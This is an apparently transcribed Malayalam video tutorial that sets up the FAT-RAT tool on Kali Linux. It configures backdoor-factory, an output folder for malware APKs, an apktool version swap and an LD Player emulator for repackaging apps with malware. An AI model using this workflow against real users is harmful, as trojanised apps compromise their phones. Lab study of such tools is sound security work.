ചെയ്യാനുള്ള റിക്വയർമെന്റ്സുകളാണ് ഇപ്പൊ എന്റെ കമ്പ്യൂട്ടറിലേക്ക് ഡൗൺലോഡ് ആയി കൊണ്ടിരിക്കുന്നത്. ഇവിടെ നോക്കാം, ഇവിടെ APK ടൂളിന്റെ വേർഷൻ നോക്കാം. APK ടൂൾ 2.6 ആണ് ഡൗൺലോഡ് ആയത്. ഇത് നമുക്ക് ചേഞ്ച് ചെയ്യണം, 9ലേക്ക് നമുക്കിത് ചേഞ്ച് ചെയ്യണം. ആഫ്റ്റർ ഇൻസ്റ്റാളേഷൻ നമുക്കത് ചെയ്യേണ്ടതുണ്ട്, എങ്കിൽ മാത്രമേ ഇത് പ്രോപ്പർ ആയിട്ട് വർക്ക് ആവുള്ളൂ. ഈ ഒരു ഇൻസ്റ്റാളേഷൻ അപ്ഡേറ്റ് ചെയ്യാൻ വെയിറ്റ് ചെയ്യാം കേട്ടോ, എങ്കിൽ മാത്രമേ നമ്മൾ ഈ ടൂൾ റൺ ആവുള്ളൂ. ഓക്കെ, ഇവിടെ കാണുന്നുണ്ട് സെറ്റപ്പ് ബാക്ക്ഡോർ ഫാക്ടറി പാത്ത് മാനുവലി എന്നൊരു ഓപ്ഷൻ ഉണ്ട്. അതല്ല നമ്മൾ കൊടുക്കേണ്ടത് ഇൻസ്റ്റാൾ ബാക്ക്ഡോർ ഫാക്ടറി ഫ്രം കാലി റെപ്പോസിറ്ററി. ഒരിക്കലും നമ്മൾ എന്ത് ചെയ്യരുത്? ഈ ഒരു മാനുവലി എന്നുള്ള ഒരു ഭാഗം കൊടുക്കരുത്. ഇത് ഓട്ടോമാറ്റിക് ആയിട്ട് ഇതിന്റെ കൂടെ തന്നെ ഇൻസ്റ്റാൾ ചെയ്യുന്ന രീതിയിൽ കൊടുക്കണം. സെക്കൻഡ് എന്നോട് ക്ലിക്ക് ചെയ്യാം. ഇൻസ്റ്റാളേഷന്റെ അവസാനത്തെ സ്റ്റെപ്പിൽ ഒരു ക്വസ്റ്റ്യൻ ചോദിക്കുന്നതാണ്, FAT-RAT ചെയ്ത് കഴിഞ്ഞാൽ നമ്മളുടെ ടാസ്ക് ഓർമ്മയുണ്ടല്ലോ, നമ്മൾ എന്താണ് ചെയ്യാൻ പോകുന്നത്? ഒരു അപ്ലിക്കേഷൻ നമ്മൾ റീപാക്കേജ് ചെയ്തതിന് ശേഷം അതിന്റെ ഔട്ട്പുട്ട് സേവ് ആവണല്ലോ, ആ ലൊക്കേഷൻ എവിടെയാണ് വേണ്ടത് എന്നാണ് ചോദിക്കുന്നത്. എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ റീപാക്കേജ് ചെയ്തിട്ടുള്ള ആപ്ലിക്കേഷൻ എവിടെ സ്റ്റോർ ചെയ്യണം എന്നുള്ള ലൊക്കേഷൻ ആണ്. അപ്പൊ ഏതെങ്കിലും ഒരു ഫോൾഡർ നിങ്ങൾ അതിന് വേണ്ടിയിട്ട് ക്രിയേറ്റ് ചെയ്ത് വെക്കുക. ഓക്കെ, ഞാനിവിടെ ടൂൾസിന്റെ ഉള്ളിൽ തന്നെ അല്ലെ വേണ്ട, ഡോക്യുമെന്റ്സിന്റെ ഉള്ളിൽ ഞാനൊരു ഫോൾഡർ ക്രിയേറ്റ് ചെയ്യാണ്, FAT-RAT ഫയൽസ് എന്ന് പറഞ്ഞിട്ട്. കാരണം ഔട്ട്പുട്ട് ഫയൽസ് എന്നാണ്, FAT-RAT ഔട്ട് ഫയൽസ്. മനസ്സിലാവുന്ന രീതിയിൽ FAT-RATന്റെ ഔട്ട്പുട്ടുകൾ സ്റ്റോർ ചെയ്യുന്നത് പറഞ്ഞാൽ ഈ ടൂൾ റൺ ചെയ്താണ്ടുള്ള ഔട്ട്പുട്ട് APK ഫയൽ ആവുമല്ലോ, മാൽവെയർ, അത് സ്റ്റോർ ചെയ്യാനുള്ള ഫോൾഡറാണ്. ഓക്കെ, എന്നിട്ട് അതിന്റെ ലൊക്കേഷൻസ് എടുക്കുക, PWD. ഓക്കെ, ഇപ്പൊ എനിക്ക് എന്ത് ചെയ്തു? ആ ഒരു ഫയലിന്റെ ലൊക്കേഷൻ കിട്ടി. ഞാൻ എന്ത് ചെയ്യാം? ആ ലൊക്കേഷൻ ഇവിടെ സ്റ്റോർ ചെയ്യാം, റൈറ്റ്. ഓക്കെ, ഞാൻ എന്ത് ചെയ്തു? ഇപ്പൊ ആ ഒരു ലൊക്കേഷൻ ഇവിടെ സ്റ്റോർ ചെയ്തിട്ട് മെൻഷൻ ചെയ്ത് കൊടുത്തിട്ടുണ്ട്, ഹോം കാലി ഡോക്യുമെന്റ്സ് FAT-RAT ഔട്ട് ഫയൽസ് എന്ന് പറഞ്ഞിട്ട്. ഇനി ഈ ടൂൾ റൺ ചെയ്യുന്ന സമയത്തൊക്കെ നമുക്ക് കിട്ടുന്ന മാൽവെയർ, ഔട്ട്പുട്ട് മാൽവെയറുകളൊക്കെ സ്റ്റോർ ചെയ്യുന്നത് ഈ ഒരു ലൊക്കേഷനിലായിരിക്കും. ഓക്കെ, ഞാൻ എൻ്റർ കൊടുത്തു. ദെൻ FAT-RAT എന്താ ഷോർട്ട് കട്ട് ക്രിയേറ്റ് ചെയ്യണം എന്നുള്ളത്. കാരണം നിങ്ങൾ ഏത് ടെർമിനലിൽ നിന്നും, ഉദാഹരണത്തിന് ഇപ്പൊ എനിക്ക് ഇവിടുന്ന് FAT-RAT, ഓക്കെ, ഇപ്പൊ നോക്കേ, അതൊരു വൈറ്റ് കളറിലാണ് കാണുന്നത്. എനിക്ക് ഏത് ടെർമിനലിലോ അല്ലെങ്കിൽ ഏത് പാത്തുനിന്നും അത് റൺ ചെയ്താൽ റൺ ആവാൻ വേണ്ടിയിട്ടാണ് അത് ചോദിക്കുന്നത്. ഇവിടെ യെസ് കൊടുക്കുക. യെസ് കൊടുത്തു കഴിഞ്ഞാൽ പിന്നെ നമുക്ക് എന്ത് ചെയ്യാം? ഈ ടൂൾ എവിടുന്നും റൺ ചെയ്യാം. ഓക്കെ, ഇനി നമ്മൾ FAT-RAT ഇനി നമ്മൾ ടൈപ്പ് ചെയ്യുന്ന സമയത്ത്, ഓക്കെ, ഇപ്പൊ നോക്കേ, FAT-RATന്റെ കളർ നോക്കേ, നീല കളറിൽ വന്നു. കാരണം അത് ഇനി ഏത് ടെർമിനലിൽ ഏത് ലൊക്കേഷനിൽ പോയിട്ട് നമുക്കിത് റൺ ചെയ്യാൻ സാധിക്കും. ഓക്കെ, ഇപ്പൊ നമ്മൾ എന്ത് ചെയ്തു? FAT-RAT ടൂൾ ഇൻസ്റ്റാളേഷൻ കംപ്ലീറ്റ് ചെയ്തു. ഇനി ഞാൻ പറഞ്ഞിട്ടുണ്ടായിരുന്നു ഇടക്ക് നമുക്ക് എന്ത് ചെയ്യണം? APK ടൂൾ ഇൻസ്റ്റാൾ ആയത് ഏതാണ്? 2.6 ആണ്. ഓക്കെ, അത് നമുക്ക് കാണാൻ പറ്റും. നമ്മൾ എന്ത് ചെയ്യാം? ജസ്റ്റ് ഇവിടെ
ഇവിടെ ടൂൾസ് എന്ന് പറയുന്ന അവരുടെ ഫാട്രാറ്റിനുള്ളിൽ ടൂൾസ് ഉണ്ട്. ആ ടൂൾസിൽ കയറാം. ദെൻ അവിടെ നിങ്ങൾക്ക് കാണാൻ പറ്റും ഇവിടെ ഒരുപാട് ടൂളുകൾ ഉണ്ട്. അതിൽ APK ടൂൾ എന്ന് കാണുന്നുണ്ട്. അതിൽ കയറാം. CD APK ടൂൾ. ഓക്കെ, അവിടെ വേർഷൻ കാണുന്നുണ്ട്. കാറ്റ് വേർഷൻ അടിച്ച് നോക്കിക്കഴിഞ്ഞാൽ ഓക്കെ ഇത് 2.6.0 ആണ്. ഓക്കെ, ഇവിടെ വെച്ച് നിങ്ങൾക്ക് ഫാട്രാറ്റ് ടൂൾ റൺ ചെയ്യാൻ പറ്റും. റൺ ചെയ്യുന്നതിന് ഇഷ്യൂ ഇല്ല. പക്ഷെ നമ്മളിത് റണ്ണ് ചെയ്ത് വരുന്നതിന്റെ ഇടയിൽ ഇതിൽ എറർ കാണിക്കും. ഓക്കെ, ഫാട്രാറ്റ് ടൂൾ റൂട്ട് വെച്ചിട്ട് റൺ ചെയ്യണം എന്ന് പറയുന്നുണ്ട്. സോ നമ്മൾ സുഡോ കൊടുക്കണം. സുഡോ, ഞാൻ പാസ്വേഡ് കൊടുത്തു. ഓക്കെ, ടൂൾ ഇവിടെ ഓപ്പൺ ആയിട്ട് വരും. പക്ഷെ നമ്മളുടെ ഔട്ട്പുട്ട് കറക്റ്റ് ആയിക്കൊള്ളണം എന്നില്ല. ഓക്കെ, നമ്മളുടെ അപ്ലിക്കേഷൻ റീപാക്കേജിങ് നടക്കണം. അപ്ലിക്കേഷൻ റിവേഴ്സ് എഞ്ചിനീയറിംഗ് നടത്തി അതിൽ മാൽവെയർ ആഡ് ചെയ്ത് തിരിച്ചതിന് എന്താക്കണം, തിരിച്ചതിന് ഡീകമ്പൈൽ നടക്കുന്ന പ്രോസസ്സിലൊക്കെ കമ്പൈലിന്റെ അവിടെയും ഡീകമ്പൈലിന്റെ അവിടെയൊക്കെ എറർ വരും. ഓക്കെ, അപ്പൊ അത് ഒഴിവാക്കാൻ വേണ്ടിയിട്ട് നമുക്ക് എന്ത് ചെയ്യണം, ഇവിടെ APK ടൂളും കൂടി നമുക്ക് എന്ത് ചെയ്യണം, ചേഞ്ച് ചെയ്യണം. ഓക്കെ, ഇപ്പൊ നമ്മൾ ഓൾറെഡി നമ്മുടെ ഡിവൈസിലൊക്കെ APK ടൂൾ ഉണ്ട്. ഓക്കെ, ഇപ്പൊ നമ്മുടെ ഡിവൈസിൽ ഒരു APK ടൂൾ ഉണ്ട്. അതിന്റെ വേർഷൻ നോക്കാം, വേർഷൻ. ഓക്കെ, ഇപ്പൊ എന്റെ കമ്പ്യൂട്ടറിലുള്ള APK ടൂൾ ആണെന്നുണ്ടെങ്കിലും ഇവിടെയുള്ള APK ടൂൾ ആണെന്നുണ്ടെങ്കിലും അതിന്റെ വേർഷൻ വരുന്നത് 2.6.0 ആണ്. ഓക്കെ, നമുക്ക് വേറൊരു ഡയറക്ടറി എടുത്തിട്ട് അവിടെ വെച്ചിട്ട് നോക്കാം. APK ഫാട്രാറ്റ് ടൂളിന്റെ പുറത്ത് വരാം. CD ഹോമിലേക്ക് വരിക. ഇനി ഒന്ന് APK ടൂൾ നോക്കാം. APK വേർഷൻ. ഓക്കെ, എന്റെ കമ്പ്യൂട്ടറിൽ ഇൻസ്റ്റാൾ ആയി കിടക്കുന്ന APK ടൂൾ എന്ന് പറയുന്നത് ഏതാണ്, 2.6.0 ആണ്. ഓക്കെ, എനിക്കത് മാറ്റിയിട്ട് 2.9.2 അതാക്കി മാറ്റണം. ഓക്കെ, അതിനെന്താ ചെയ്യേണ്ടതെന്ന് ചോദിച്ചു കഴിഞ്ഞാൽ നമ്മൾ എന്ത് ചെയ്യാം, അതിന് ഡൗൺലോഡ് ചെയ്യാനുള്ള ഓപ്ഷൻ ഉണ്ട്. ഇവിടെ APK ടൂൾ ഇൻസ്റ്റാൾ എന്ന് സെർച്ച് ചെയ്യാം. ഓക്കെ, ഫസ്റ്റ് വരുന്നതന്നെ ഇൻസ്റ്റാൾ ഗൈഡ് APK ടൂൾ എന്ന് വരുന്നുണ്ടല്ലോ, അത് ഓപ്പൺ ആക്കുക. ഇതിൽ ഇൻസ്റ്റാളേഷൻ എങ്ങനെ ചെയ്യണം എന്നുള്ള കാര്യം ഡീറ്റെയിൽ ചെയ്ത് പറയുന്നുണ്ട്. ഇവിടെ താങ്കൾ പറയുന്നുണ്ട്, ഓരോരോ പ്രോസസ്സ് പറയുന്നുണ്ട്. അതിലിവിടെ ഡൗൺലോഡ് ദ ലേറ്റസ്റ്റ് വേർഷൻ എന്ന് പറയുന്ന ഇത് ക്ലിക്ക് ചെയ്യാം. രണ്ടാമത്തെ ഓപ്ഷൻ ഡൗൺലോഡ് ദ ലേറ്റസ്റ്റ് വേർഷൻ ഓഫ് APK ടൂൾ. ഓക്കെ, അതിൽ ക്ലിക്ക് ചെയ്യാം. അവിടെ കാണുന്നുണ്ടാകും 2.9.2 എന്ന് പറയുന്ന വേർഷൻ. എന്തുകൊണ്ട് ഞാൻ ഈ വേർഷൻ തന്നെ എടുക്കാം, ലേറ്റസ്റ്റ് വേർഷൻസ് ഒക്കെ ഇവിടെ കാണാൻ പറ്റും നിങ്ങൾക്ക്. പക്ഷെ നമ്മൾ ഈ പറയുന്ന പ്രോസസ്സ് ആപ്ലിക്കേഷൻ റീപാക്കേജിങ് പ്രോപ്പർ ആയിട്ട് വർക്ക് ചെയ്യുന്നത് ഈ പറയുന്ന വേർഷനിലാണ്. അതുകൊണ്ടാണ് ഞാൻ ഈ ഒരു വേർഷൻ സജസ്റ്റ് ചെയ്യുന്നത്, ലേറ്റസ്റ്റ് വേർഷൻ. നിങ്ങൾക്ക് ഇനി APK ടൂൾ ലേറ്റസ്റ്റ് ആക്കണമെന്നുണ്ടെങ്കിൽ നിങ്ങൾക്ക് എന്ത് ചെയ്യാം, ഈ വേർഷൻ ഡൗൺലോഡ് ചെയ്യാം. പക്ഷേ ഈ ഒരു ടൂൾ പ്രോപ്പർ ആയിട്ട് റൺ ആവുന്ന വേർഷൻ ആണ് ഞാൻ ഇവിടെ ചൂസ് ചെയ്തത്. APK ടൂൾ 2.9.2 എന്ന് പറയുന്ന ഈ വേർഷൻ എന്ത് ചെയ്യുന്നു, ഞാൻ ഡൗൺലോഡ് ചെയ്യുന്നു. ഓക്കെ, ഒന്ന് ക്ലിക്ക് ചെയ്താൽ മതി, അത് ഇവിടെ എന്താവും, ഡൗൺലോഡ് ആവുന്നുണ്ടാവും. ഓൾറെഡി അവരുടെ ഫയലിൽ ഒരു APK ടൂൾ ഉണ്ട്. ഓക്കെ, LS അടിച്ചു തന്ന സമയത്ത് ഇവിടെ നമുക്ക് കാണുന്നുണ്ടല്ലോ, ഇവിടെ ഒരു APK tool.jar എന്ന് പറയുന്ന ഫയൽ ഉണ്ട്. നമ്മൾ ഇനി ചെയ്യാൻ പോകുന്നത് ഇവിടെയുള്ള ഫയലിനെ ഇവര് ഈ APK tool.jar ഏത് വേർഷൻ നമ്മൾ നോക്കിയതാണ് 2.6.0 ആണ്. അത് മാറ്റിയിട്ട് ഇപ്പോൾ ഡൗൺലോഡ് ആയിട്ടുള്ള ഫയൽ നമ്മൾ ഇവിടെ റീപ്ലേസ് ചെയ്യും. അതിന് ആദ്യം ആ ഫയലിന്റെ പേര് മാറ്റണം. ആ ഫയലിന്റെ പേര് ഇപ്പൊ എന്താ കിടക്കുന്നത്, വലിയൊരു ഫയലായിട്ടാണ് കിടക്കുന്നത്. ജസ്റ്റ് ആ പേര് മാറ്റണം. CD ഡൗൺലോഡ്സ്, ഡൗൺലോഡ് ആയ കണ്ടന്റ്സ് ഒക്കെ എവിടെ ഉണ്ടാവുക, ഡൗൺലോഡ്സ് ഫോൾഡറിലായിരിക്കും. ഓക്കെ, ഇവിടെ ഒരുപാട് ഫയൽസ് ഉണ്ട്. LS APK ടൂൾ. ഓക്കെ, ഈ ഫയലാണ് നമുക്ക് എന്ത് ചെയ്യേണ്ടത്, ഇങ്ങനെ ഒരു ഫയൽ ഇവിടെ ഉണ്ട്. ഈ ഫയലിന്റെ പേരാണ് നമുക്ക് മാറ്റേണ്ടത്. ഓക്കെ, അപ്പൊ ഞാൻ എന്ത് ചെയ്യുന്നു, ഓക്കെ ജസ്റ്റ് റീനെയിം ചെയ്യാനുള്ള കമാൻഡ് എന്തിലില്ല, ലിനക്സിലില്ല. ലിനക്സിൽ നമ്മൾ മൂവ് കമാൻഡ് യൂസ് ചെയ്തിട്ടാണ്, MV കമാൻഡ്, മൂവ് കമാൻഡ് യൂസ് ചെയ്തിട്ടാണ് ഒരു ഫയലിന്റെ നെയിം മാറ്റുന്നത്. റീനെയിം കമാൻഡ് ഇല്ലാന്നേ ഉള്ളൂ. റീനെയിം ഫയൽ മാനേജറിലൊക്കെ പോയി കഴിഞ്ഞാൽ നമുക്ക് റീനെയിം ഓപ്ഷൻ ഉണ്ട്. പക്ഷെ കമാൻഡ്, ടെർമിനൽ കമാൻഡിൽ റീനെയിം കമാൻഡ് ഇല്ല. MV, എനിക്ക് ഫയൽ നെയിം മാറ്റണം. ഏതിന്റെ പേര് മാറ്റണ്ടേ, APK ടൂൾ 2.9.2 jar. ഈ ഫയലിന്റെ പേര് മാറ്റണം. എന്താക്കി മാറ്റണം, APK tool.jar ഈ ഫയൽ ആക്കിയിട്ട് എനിക്ക് മാറ്റണം. ജസ്റ്റ് എൻ്റർ അടിച്ചാൽ മതി. ഓക്കെ, ഇപ്പൊ എന്തായി, APK tool 2.9.2 എന്നുള്ളത് ഏത് പേരിലേക്ക് മാറി, APK tool.jar എന്ന പേരിലേക്ക് മാറി. ഓക്കെ, അത് മാത്രം മാറ്റിയാൽ മതിയോ, അല്ല, നമുക്ക് എന്ത് ചെയ്യണം, ഈ ഫയൽ ഇവിടുന്ന് ഡിലീറ്റ് ചെയ്യണം. ഇത് നമുക്ക് ഇനി ആവശ്യമില്ല. കാരണം എന്താണ്, 2.6.0 APK ടൂൾ ആണ്. അത് ഞാൻ എന്ത് ചെയ്യുന്നു, ഇവിടുത്തെ ഡിലീറ്റ് ചെയ്യുന്നു. RM റിമൂവ് APK tool. ഫസ്റ്റ് ഫയൽ കളയരുത്, രണ്ടാമത്തെ ഫയൽ മാത്രമേ കളയാൻ പാടുള്ളൂ കേട്ടോ. RM APK tool.jar, APK ഇത് കളയരുത്.
ഓക്കെ, ഞാനത് റിമൂവ് എടുത്തു. ls എന്ത് ചെയ്തു, ആ ഫയൽ അവിടെ നിന്ന് റിമൂവ് ആയി. ഇനി ഞാൻ എന്ത് ചെയ്യണം, പുതിയ ഫയലിനെ ഈ ഒരു ലൊക്കേഷനിലേക്ക് നീക്കണം. ഓക്കെ, അപ്പൊ ഞാൻ അതിന്റെ പാത്ത് കോപ്പി ചെയ്തു. കാരണം നമുക്ക് നീക്കേണ്ട സമയം മൂവ് ചെയ്യണമെന്നുണ്ടെങ്കിൽ പാത്ത് വേണം. അപ്പൊ ഞാൻ ഇവിടുന്ന് പാത്ത് കോപ്പി ചെയ്തു. ദെൻ ഡൗൺലോഡ്സിൽ പോയി mv നമുക്ക് എന്ത് ചെയ്യണം, apktool.jar, കാരണം നമ്മൾ പേര് മാറ്റിയിട്ടുണ്ടായിരുന്നു, // ഓക്കെ, ഇപ്പൊ അത് കറക്റ്റ് ആയി. ഒന്ന് ബോൾഡ് ആയല്ല, അപ്പൊ ഇതിന്റെ അർത്ഥം ഇത് കറക്റ്റ് ആയി എന്നുള്ള, പാത്ത് കറക്റ്റ് ആയി എന്നുള്ളതാണ്. എന്തിനാണ് ഇവിടെ // കൊടുത്തത്, നമ്മൾ ഇപ്പൊ നിൽക്കുന്നത് ഡൗൺലോഡ്സ് ഫോൾഡറിലാണ്. ഓക്കെ, ഈ ടൂൾസ് എന്ന് പറയുന്ന ഫോൾഡർ എവിടെ ഉള്ളത്, ഡൗൺലോഡ്സ് ഫോൾഡറിന്റെ മുന്നത്തെ ഫോൾഡറിലാണ്. എന്ന് പറഞ്ഞാൽ എന്റെ ഹോം കാലിക്കകത്താണ് ഉള്ളത്. ഹോം എന്ന് പറയുന്ന ഫോൾഡറിനുള്ളിൽ കാലി എന്ന് പറയുന്ന എന്റെ യൂസർ ഫോൾഡറിനുള്ളിലാണ് ടൂൾസ് എന്ന് പറയുന്ന ഫോൾഡർ ഉള്ളത്. അപ്പൊ അങ്ങോട്ട് ബാക്കിലോട്ട് ഒന്ന് പോയിട്ട് പോകാൻ വേണ്ടിയിട്ടാണ് ഇവിടെ // ഞാൻ ആഡ് ചെയ്തത്. ഓക്കെ, ഞാൻ എൻ്റർ അടിച്ചു കഴിഞ്ഞാൽ യെസ്, ഇപ്പൊ ഇവിടെ എന്ത് ചെയ്തു, apk tool എന്ന് പറഞ്ഞ ടൂള് ഇവിടുന്ന് പോയിട്ടുണ്ടാകും. ഓക്കെ, apk tool.jar, ആ ഫയൽ ഇപ്പൊ ഇവിടെ ഇല്ല. കാരണം ആ ഫയൽ ഇപ്പം ഇവിടെ എത്തിയിട്ടുണ്ട്, ഈ ഡൗൺലോഡ്സിൽ നിന്ന് നമ്മളുടെ ഈ ലൊക്കേഷനിലേക്ക് എത്തിയിട്ടുണ്ടാവും. ഇതാ, നമ്മളിവിടെ മൂവ് ചെയ്ത ഫയൽ ഇപ്പോൾ ഇവിടെ എത്തി. ഇനി നമുക്ക് ഈ ടൂൾ യൂസ് ചെയ്യാം. ഓക്കെ, ഇനി നമുക്ക് ഫാറ്റ് ടൂൾ റൺ ചെയ്താൽ ഇഷ്യൂസ് വരില്ല. അപ്പൊ ഈ ഒരു കാര്യം കൂടി ശ്രദ്ധിക്കുക. ഫാറ്റ് ടൂളിൽ നമ്മൾ എന്ത് ചെയ്യണം, ടൂളിന്റെ വേർഷൻ 2.9 ഡൗൺലോഡ് ചെയ്തിട്ട് അത് ഇവിടെ റീപ്ലേസ് ചെയ്യണം. ഇനി ഇവിടെ വേർഷനിലും നമ്മൾ അത് മാറ്റണം. നാനോ, ഞാൻ എന്ത് ചെയ്യുന്നു, വേർഷൻ ഇപ്പൊ അവിടെ എത്ര കിടക്കുന്നത്, 2.6.0 എന്നാണ് കിടക്കുന്നുണ്ടാവുക. അത് മാറ്റിയിട്ട് 2.9.2 എന്ന് ആക്കി കൊടുക്കണം. ഓക്കെ, കൺട്രോൾ O, സേവ് അടിക്കാൻ വേണ്ടിയിട്ട് കൺട്രോൾ O എൻ്റർ അടിച്ചു. ദെൻ ഇതിൽ നിന്ന് പുറത്ത് വരണമെന്നുണ്ടെങ്കിൽ കൺട്രോൾ X. ഓക്കെ, അപ്പൊ നാനോ എന്ന് പറയുന്നത് എഡിറ്റ് ചെയ്യാൻ വേണ്ടിയിട്ട് നമ്മൾ, നാനോ എന്ന് പറയുന്നത് ഒരു CLI ടെക്സ്റ്റ് എഡിറ്റർ ആണ്. CLI എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ നമുക്ക് ടെർമിനൽ വഴി എഡിറ്റ് ചെയ്യാൻ യൂസ് ചെയ്യുന്ന, ഒരു ഫയൽ എഡിറ്റ് ചെയ്യാൻ വേണ്ടി യൂസ് ചെയ്യുന്ന ടൂളാണ് നാനോ. അപ്പൊ ഞാൻ എന്ത് ചെയ്തു, വേർഷൻസ് എന്ന് പറയുന്ന ഫയലിലെ കണ്ടന്റ് മാറ്റി. ഓക്കെ, നോക്കാം എന്താണ് ഇനി വേർഷൻസിലുള്ളത്. 2.9.2 apk tool 2.9.2. ഇനി നമുക്ക് എന്ത് ചെയ്യാം, നമ്മളുടെ ടാസ്ക് കഴിഞ്ഞു. ഫാറ്റ് റാറ്റ് ടൂള് നമ്മൾ കംപ്ലീറ്റ് കാര്യങ്ങളും നമ്മൾ കോൺഫിഗർ ചെയ്തു. ഇനി നമുക്ക് റൺ ചെയ്ത് നോക്കാം. ഇനി നമുക്കൊരു എമുലേറ്റർ വേണം, അല്ലെങ്കിൽ ഒരു ഡെഡിക്കേറ്റഡ് ആയിട്ടുള്ള ഒരു മൊബൈൽ ഫോൺ വേണം ഇത് നമുക്ക് ഇൻസ്റ്റാൾ ചെയ്യാൻ വേണ്ടിയിട്ട്. ആപ്ലിക്കേഷൻ നമുക്ക് എന്ത് ചെയ്യണം, അവസാനം ഈ മാൽവെയർ ഇൻസ്റ്റാൾ ചെയ്യണം. അതിന് വേണ്ടിയിട്ടൊരു ഡെഡിക്കേറ്റഡ് മൊബൈൽ ഫോൺ, അത് പറ്റില്ല എങ്കിൽ നമുക്ക് എന്ത് ചെയ്യാം, എമുലേറ്റേഴ്സ് യൂസ് ചെയ്യാം. ഓക്കെ, നോർമലി എമുലേറ്റേഴ്സ് എന്ന് പറയുന്നത് നമ്മൾ കോമൺലി യൂസ് ചെയ്യുന്നത് ജെനിമോഷൻ. ജെനിമോഷൻ നല്ലൊരു എമുലേറ്റർ ആണ്, പക്ഷേ കുറച്ച് എന്താണ്, കുറച്ച് സ്പേസ് വേണം. അതുപോലെ ഇതിനും ഉണ്ട് ഒരു പ്രോ വേർഷനൊക്കെ യൂസ് ചെയ്യുന്നുണ്ട്. അപ്പോൾ അതിൽ മാത്രമേ കൂടുതൽ ഫീച്ചറും കാര്യങ്ങളും ഉണ്ടാവുള്ളൂ. അപ്പോൾ നമുക്ക് എന്ത് ചെയ്യാം, ഇത് ജസ്റ്റ് ഒഴിവാക്കാം. ജെനിമോഷൻ്റെ ആപ്ലിക്കേഷൻ വേണ്ട. പകരം നമ്മൾ എന്ത് ചെയ്യാം, ഇവിടെ ഡൗൺലോഡ്സിൽ പോയ ജെനിമോഷൻ നിങ്ങൾക്ക് കിട്ടും. പക്ഷെ നമുക്ക് മാക്സിമം ജെനിമേഷൻ ഒഴിവാക്കിയിട്ട് നമുക്ക് സിമ്പിളായിട്ടുള്ളത് LD പ്ലെയർ ഡൗൺലോഡ് ചെയ്യാം. ഓക്കെ, LD പ്ലെയർ 9, LD പ്ലെയർ കൊടുക്കുമ്പോൾ തന്നെ ഫസ്റ്റ് വരും. ദെൻ ഇതിൽ ക്ലിക്ക് ചെയ്യാം, ഫസ്റ്റ് ലിങ്കിൽ തന്നെ, അവിടെ തന്നെ ഹോം പേജിൽ തന്നെ ഉണ്ടാവും ഡൗൺലോഡ് ബട്ടൺ. സെർച്ച് ചെയ്ത് പോകേണ്ട ആവശ്യമൊന്നുമില്ല, ഹോം പേജിൽ തന്നെ ഒരു ഡൗൺലോഡ് ബട്ടൺ ഉണ്ടാകും. അല്ലെങ്കിൽ LD പ്ലെയർ ഡൗൺലോഡ് എന്ന് പറഞ്ഞൊരു ലിങ്ക് ഉണ്ട്, അതിൽ ക്ലിക്ക് ചെയ്താലും നേരെ നമ്മൾക്ക് ആ ഫയലിലേക്ക് ആക്സസ് ചെയ്യാൻ പറ്റും. കാണുന്ന ഇത് ക്ലിക്ക് ചെയ്താൽ തന്നെ നമ്മൾ LD പ്ലെയർ ഡൗൺലോഡ് ആയിട്ട് വരും. ഓക്കെ, ദെൻ LD പ്ലെയർ ഡൗൺലോഡ് ആയി. ജസ്റ്റ് അത് ഡബിൾ ക്ലിക്ക് ചെയ്തിട്ട് അതെന്ത് ചെയ്യാം, ഇൻസ്റ്റാൾ ചെയ്യാം. ഓക്കെ, ദെൻ നമ്മളിപ്പോൾ LD പ്ലെയർ ഇൻസ്റ്റാൾ ചെയ്തു. അതിനുശേഷം നിങ്ങൾ എന്ത് ചെയ്യണം, LD പ്ലെയർ ഓപ്പൺ ആക്കണം. ദെൻ LD പ്ലെയറിൽ മുകളിൽ ഇവിടെ സെറ്റിങ്സ് കാണാൻ പറ്റുന്നുണ്ട്. ആ സെറ്റിങ്സിലൊന്ന് ക്ലിക്ക് ചെയ്യാം. ദെൻ ഇവിടെ കുറച്ച് ചേഞ്ചസ് നമുക്ക് വരുത്താനുണ്ട്.
അതിൽ ഫസ്റ്റ് വൺ എന്ന് പറയുന്നത് നെറ്റ്വർക്ക് എന്ത് ചെയ്തിരിക്കണം, നിങ്ങളിവിടെ നെറ്റ്വർക്ക് ബ്രിഡ്ജിങ് ഓഫായിട്ടായിരിക്കും കിടക്കുന്നുണ്ടാവുക, അതിവിടെ എനബിൾ ആക്കണം. ഓക്കെ, അത് എനബിൾ ആക്കുമ്പോൾ സ്വാഭാവികമായിട്ടും ഒരു സേവ് ചെയ്യണോ എന്നൊരു മെസ്സേജ് വരും. അത് നമ്മൾ സേവ് കൊടുത്തു കഴിഞ്ഞാൽ ഈ പറയുന്ന LD പ്ലെയർ ഒന്ന് റീസ്റ്റാർട്ട് ചെയ്യേണ്ടി വരും. ഓക്കെ, ദെൻ വീണ്ടും സെറ്റിങ്സിൽ പോവാം. ദെൻ നിങ്ങൾ നെറ്റ്വർക്ക് വീണ്ടും ബ്രിഡ്ജിങ് ആയിട്ടില്ലേ എന്നുള്ളൊരു കാര്യം എൻഷുർ ചെയ്യാം, ഒന്നാമത്തെ കാര്യം. പിന്നെ നിങ്ങളുടെ വിൻഡോസിലേക്ക് എങ്ങനെയാണ് ഇൻ്റർനെറ്റ് എടുത്തത്, എതർനെറ്റ് വഴിയാണോ അതോ വൈഫൈ വഴിയാണോ എന്ന് മനസ്സിലാക്കുക. അതിവിടെ ഓപ്ഷൻ സെലക്ട് ചെയ്യാം. എതർനെറ്റ് വഴിയാണെങ്കിൽ ഇവിടെ എന്ത് ചെയ്യണം, ഇൻറ്റൽ, ഇപ്പോൾ എൻ്റെ ഈ ഒരു കമ്പ്യൂട്ടറിലാണെന്നുണ്ടെങ്കിൽ എതർനെറ്റ് കണക്ഷൻ എന്നുള്ളത് ക്ലിക്ക് ചെയ്യാം. വൈഫൈ പ്രകാരമാണെങ്കിൽ ഞാനിപ്പോൾ ഇവിടെ ഇൻ്റർനെറ്റ് എടുത്തിരിക്കുന്നത് വൈഫൈ പ്രകാരമാണ്. അപ്പോൾ ഞാൻ എന്ത് ചെയ്തു, വൈഫൈ എന്നിവിടെ കൊടുത്തിട്ടുണ്ട്, ഇൻറ്റൽ R1 വൈഫൈ എന്നുള്ളത് ഇത് സെലക്ട് ചെയ്തു. ഇതാണ് എൻ്റെ നെറ്റ്വർക്ക് ഇൻ്റർഫേസ് കാർഡ് എന്ന് പറയുന്നത്. ഓക്കെ, ഇതൊക്കെ സെലക്ട് ആയിരിക്കണം. ദെൻ അതേപോലെ തന്നെ വേറൊരു 